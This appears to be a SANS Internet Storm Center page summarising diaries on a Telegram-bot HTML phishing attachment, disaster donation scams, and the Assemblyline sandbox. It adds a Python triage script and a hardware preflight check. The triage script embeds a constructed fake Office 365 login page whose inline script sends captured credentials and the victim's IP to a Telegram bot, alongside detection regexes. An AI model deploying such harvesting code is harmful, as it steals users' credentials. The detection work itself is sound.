INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Simple HTML Phishing via Telegram Bot
Published: 2023-02-08
Last Updated: 2023-02-08 13:56:11 UTC
by Johannes Ullrich (Version: 1)
On Monday, I wrote about the use of IP lookup APIs by bots. It turns out that it is not just bots using these APIs; phishing e-mails are also taking advantage of them.
The phish itself is not particularly remarkable. It arrives as an email claiming to include a payment confirmation. The email includes a small thread of messages, likely to make it more plausible. The best I can guess is that the email is supposed to make the recipient curious to open the attachment. The attachment itself is a simple HTML file simulating an Office 365 page.
Read the full entry:
https://isc.sans.edu/diary/Simple+HTML+Phishing+via+Telegram+Bot/29528/
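The diary describes an HTML attachment that shows a fake Office 365 login, looks up the victim's IP with a public geolocation API and posts the captured credentials to a Telegram bot. The triage script below is an added example, not code from the ISC diary or from the phishing kit: it scans a saved .html attachment for exactly those indicators (a password form, a call to api.telegram.org/bot<token>/..., and a request to an IP lookup service). The sample attachment, the bot token in it, the list of IP lookup hosts and the assumed 35-character token secret are all constructed for this example.

```python
"""Triage an HTML phishing attachment for Telegram-bot exfiltration and IP lookup calls.

Added example, not code from the ISC diary or the phishing kit it describes.
Usage: python triage_html_phish.py attachment.html   (no argument: scans SAMPLE_HTML)
"""
import re
import sys
from html.parser import HTMLParser

# Constructed sample in the style the diary describes: a fake Office 365 form whose
# submit handler posts the credentials plus the victim's IP to a Telegram bot.
# The bot token, chat id and page content are made up for this example.
SAMPLE_HTML = """<html><body><h1>Microsoft Office 365</h1>
<form id="f"><input name="login"><input name="passwd" type="password"></form>
<script>
fetch("https://ipapi.co/json/").then(r => r.json()).then(geo => {
  document.getElementById("f").onsubmit = function () {
    fetch("https://api.telegram.org/bot123456789:AAExampleTokenExampleTokenExample12/sendMessage",
      {method: "POST", body: JSON.stringify({chat_id: "-100123",
        text: login.value + " " + passwd.value + " " + geo.ip})});
    return false;
  };
});
</script></body></html>"""

# Telegram Bot API calls look like https://api.telegram.org/bot<token>/<method>.
# Assumption: the token is a numeric bot id, a colon and a ~35-character secret;
# the length range is kept loose so a slightly different format is not missed.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{30,50})/(?P<method>[A-Za-z]+)"
)
URL_RE = re.compile(r"""https?://[^\s"'<>()\\]+""")

# Public IP lookup services used by such kits to geolocate victims. This list is an
# assumption of the example; extend it with whatever your own telemetry shows.
IP_LOOKUP_HOSTS = {"ipapi.co", "ip-api.com", "ipinfo.io", "api.ipify.org", "ipgeolocation.io"}


class _FormScanner(HTMLParser):
    """Counts password inputs and records form actions, so a credential-harvesting
    page can be told apart from a plain HTML document with a link in it."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        if tag == "form":
            self.form_actions.append(a.get("action") or "")


def extract_urls(text):
    """All http(s) URLs in the raw attachment, including those inside inline scripts."""
    return sorted(set(URL_RE.findall(text)))


def host_of(url):
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()


def find_telegram_bots(text):
    """Return (token, method) pairs. The token is the operator's bot credential and
    is the indicator worth keeping when you report the campaign."""
    return [(m.group("token"), m.group("method")) for m in TELEGRAM_BOT_RE.finditer(text)]


def assess(html):
    """Classify an attachment: 'phish' needs both a password form and Telegram exfil,
    'suspicious' for any single indicator, otherwise 'clean'."""
    scanner = _FormScanner()
    scanner.feed(html)
    urls = extract_urls(html)
    bots = find_telegram_bots(html)
    lookups = [u for u in urls if host_of(u) in IP_LOOKUP_HOSTS]
    indicators = []
    if scanner.password_inputs:
        indicators.append("password_form")
    if bots:
        indicators.append("telegram_bot_exfil")
    if lookups:
        indicators.append("ip_lookup_api")
    if "password_form" in indicators and "telegram_bot_exfil" in indicators:
        verdict = "phish"
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators,
            "telegram_bots": bots, "ip_lookups": lookups, "urls": urls}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    else:
        data = SAMPLE_HTML
    for key, value in assess(data).items():
        print(f"{key}: {value}")
```

The regexes run over the raw file on purpose: the exfil URL usually sits inside an inline script, which an HTML parser treats as opaque text. A kit that builds the URL from concatenated fragments or base64 will evade this check, so treat a "clean" verdict as "no known indicator", not as safe.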
Earthquake in Turkey and Syria: Be Aware of Possible Donation Scams
Published: 2023-02-06
Last Updated: 2023-02-06 18:40:43 UTC
by Johannes Ullrich (Version: 1)
Last night, Turkey and Syria were affected by a significant earthquake. Sadly, experience teaches us that disasters like this will often be abused. The most common scam involves fake donation websites. But you may also see malware disguised as a video or images from the affected region.
Here are some tips to share:
Do not donate to organizations you have not heard of before the event. Only donate to organizations that have an established track record.
If you have contacts in the affected area: Try to reach out to them to find out how to help them.
Scams may target people with links to the affected region. Be careful with phone calls or emails claiming to ask for money on behalf of a relative or friend. Scammers may use social media data and may contact you via social media.
Do not blindly believe requests for help on social media.
Do not just Google for ways to donate money.
Read the full entry:
https://isc.sans.edu/diary/Earthquake+in+Turkey+and+Syria+Be+Aware+of+Possible+Donation+Scams/29518/
Assemblyline as a Malware Analysis Sandbox
Published: 2023-02-04
Last Updated: 2023-02-04 23:53:30 UTC
by Guy Bruneau (Version: 1)
If you are looking for a malware sandbox that is easy to install and maintain, Assemblyline (AL) [1] is likely the system you want to be part of your toolbox. "Once a file is submitted to Assemblyline, the system will automatically perform multiple checks to determine how to best process the file. One of Assemblyline's most powerful functionalities is its recursive analysis model."[2]
First step, install the server. My server configuration is as follows:
Ubuntu 22.04
Ubuntu Server (minimized)
8+ Cores
16+ GB RAM
100 GB
100+ GB /var/lib/docker
Static IP
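Before installing, it is worth confirming the host actually meets the sizing above, since an undersized Docker volume is the usual reason an Assemblyline install fills up. The preflight script below is an added example, not part of the ISC diary or of Assemblyline itself. It assumes the bare "100 GB" line refers to the root filesystem, treats the listed GB figures as GiB minimums, and only reports the IP configuration question back to the operator because a static address cannot be verified from inside the host.

```python
"""Preflight check for the Assemblyline server sizing listed in the diary.

Added example, not part of the ISC diary or of Assemblyline. Run it on the
candidate Ubuntu host before starting the installation.
"""
import os
import shutil

GIB = 1024 ** 3
# Minimums from the diary's configuration. Assumption: the bare "100 GB" line is
# the root filesystem, and GB is read as GiB.
MINIMUMS = {"cores": 8, "ram_gib": 16, "root_gib": 100, "docker_gib": 100}


def parse_meminfo_total_gib(meminfo_text):
    """MemTotal in /proc/meminfo is reported in kB (really KiB)."""
    for line in meminfo_text.splitlines():
        if line.startswith("MemTotal:"):
            kib = int(line.split()[1])
            return kib * 1024 / GIB
    raise ValueError("MemTotal not found in meminfo text")


def check_requirements(cores, ram_gib, root_gib, docker_gib, minimums=MINIMUMS):
    """Return (resource, actual, required) for every shortfall; an empty list means the
    host meets all listed minimums."""
    actual = {"cores": cores, "ram_gib": ram_gib, "root_gib": root_gib, "docker_gib": docker_gib}
    return [(k, actual[k], minimums[k]) for k in minimums if actual[k] < minimums[k]]


def nearest_existing(path):
    """/var/lib/docker may not exist before Docker is installed; walk up to the
    closest existing ancestor so disk_usage() has something to measure."""
    while not os.path.exists(path):
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return path


def filesystem_gib(path):
    return shutil.disk_usage(nearest_existing(path)).total / GIB


def docker_has_own_filesystem(path="/var/lib/docker"):
    """True when the Docker data directory is on a different filesystem than '/'.
    If it is not, the '100 GB' root and '100+ GB /var/lib/docker' figures are the
    same disk, and the container images and sandbox artifacts compete with the OS."""
    return os.stat(nearest_existing(path)).st_dev != os.stat("/").st_dev


def gather():
    with open("/proc/meminfo", encoding="ascii") as fh:
        ram = parse_meminfo_total_gib(fh.read())
    return {
        "cores": os.cpu_count() or 0,
        "ram_gib": ram,
        "root_gib": filesystem_gib("/"),
        "docker_gib": filesystem_gib("/var/lib/docker"),
    }


if __name__ == "__main__":
    facts = gather()
    for name, value in facts.items():
        print(f"{name:>10}: {value:.1f}" if isinstance(value, float) else f"{name:>10}: {value}")
    shortfalls = check_requirements(**facts)
    for resource, have, need in shortfalls:
        print(f"SHORT: {resource} = {have:.1f}, diary minimum is {need}")
    if not docker_has_own_filesystem():
        print("NOTE: /var/lib/docker shares the root filesystem; the two 100 GB figures overlap")
    print("Confirm the host has a static IP; this cannot be checked from here.")
    raise SystemExit(1 if shortfalls else 0)
```

`check_requirements` is deliberately separated from `gather` so the thresholds can be exercised with known values; the non-zero exit status lets the same script gate an automated build.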
Read the full entry:
https://isc.sans.edu/diary/Assemblyline+as+a+Malware+Analysis+Sandbox/29510/